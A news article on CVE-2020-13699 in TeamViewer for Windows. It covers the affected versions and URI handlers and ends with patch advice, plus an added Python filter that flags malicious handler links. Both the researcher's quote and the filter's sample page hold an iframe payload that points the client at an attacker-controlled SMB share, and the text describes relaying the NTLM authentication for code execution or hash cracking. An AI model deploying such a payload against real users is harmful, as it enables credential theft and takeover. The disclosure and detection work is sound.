Security flaw CVE-2020-13699 found in TeamViewer app allows an attacker to gain complete access to a target system
TeamViewer is a proprietary software application for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers. It is an amazing tool that lets users share their desktops when they are stuck somewhere, so that the person on the receiving end can access them. But researchers have discovered that TeamViewer for Windows has a vulnerability that allows remote attackers to crack users' passwords, which can lead to a further takeover.
The flaw came to light because of the increase in work-from-home policies and in people sharing their work remotely. The vulnerability is tracked as CVE-2020-13699 and received a score of 8.8/10 on the Common Vulnerability Scoring System (CVSS) scale.
The security flaw in the app is an unquoted search path or element: more specifically, the application does not properly quote its custom URI handlers. It could be exploited when a system with a vulnerable version of TeamViewer installed visits a maliciously crafted website.
According to the research, the security flaw affects TeamViewer for Windows desktop versions prior to 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 and 15.8.3.
"An attacker could embed a malicious iframe in a website with a crafted URL (<iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'>) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share," said Jeffrey Hofmann, the researcher who discovered the flaw.
As the researcher found, exploitation of the security flaw can be initiated remotely and requires no prior authentication. The flaw seems ideal for targeted watering hole attacks. There is no indication that this vulnerability is being exploited in the wild, and no public exploit is currently available.
Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking). This affects the URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1.
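As an added example (not from the original article, the researcher or TeamViewer), the following sketch shows how a mail or web content filter could flag markup that references the affected URI handlers. The function names, the verdict labels and the heuristic (a command-line switch or a backslash UNC path after the scheme) are assumptions made for illustration, and the sample page is constructed with placeholder addresses.

```python
from html.parser import HTMLParser
from urllib.parse import unquote

# URI handlers the article lists as affected by CVE-2020-13699.
AFFECTED_SCHEMES = frozenset({
    "teamviewer10", "teamviewer8", "teamviewerapi", "tvchat1", "tvcontrol1",
    "tvfiletransfer1", "tvjoinv8", "tvpresent1", "tvsendfile1",
    "tvsqcustomer1", "tvsqsupport1", "tvvideocall1", "tvvpn1",
})

def classify_uri(uri):
    """Return None, 'handler' or 'handler+args' for one attribute value."""
    scheme, sep, rest = uri.strip().partition(":")
    if not sep or scheme.lower() not in AFFECTED_SCHEMES:
        return None
    rest = unquote(rest)  # normalise percent-encoding before matching
    # Assumed heuristic: a switch or a UNC path after the scheme means the
    # link tries to hand extra arguments to the desktop client.
    has_switch = any(tok.startswith("-") for tok in rest.split())
    has_unc = "\\\\" in rest
    return "handler+args" if has_switch or has_unc else "handler"

class _UriCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.found = []  # (tag, attribute value) pairs

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "href") and value:
                self.found.append((tag, value))

def scan_html(html):
    """Return (tag, uri, verdict) for each reference to an affected handler."""
    collector = _UriCollector()
    collector.feed(html)
    hits = [(tag, uri, classify_uri(uri)) for tag, uri in collector.found]
    return [hit for hit in hits if hit[2]]

# Constructed sample page; the address and file names are placeholders.
SAMPLE = r"""
<a href="https://example.com/help">help</a>
<a href="tvjoinv8:m123">join meeting</a>
<iframe src='teamviewer10: --play \\192.0.2.10\share\fake.tvs'></iframe>
"""

if __name__ == "__main__":
    print(*scan_html(SAMPLE), sep="\n")
```

A 'handler+args' verdict is the case worth alerting on or blocking; a plain 'handler' hit may be a legitimate TeamViewer link and is reported only for visibility.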
However, the researcher also said that no exploitation of the flaw had been spotted yet, and that the company was informed at the time of discovery. TeamViewer has already fixed the bug and released a patched version. Users are advised to update their TeamViewer app as soon as possible to avoid the flaw.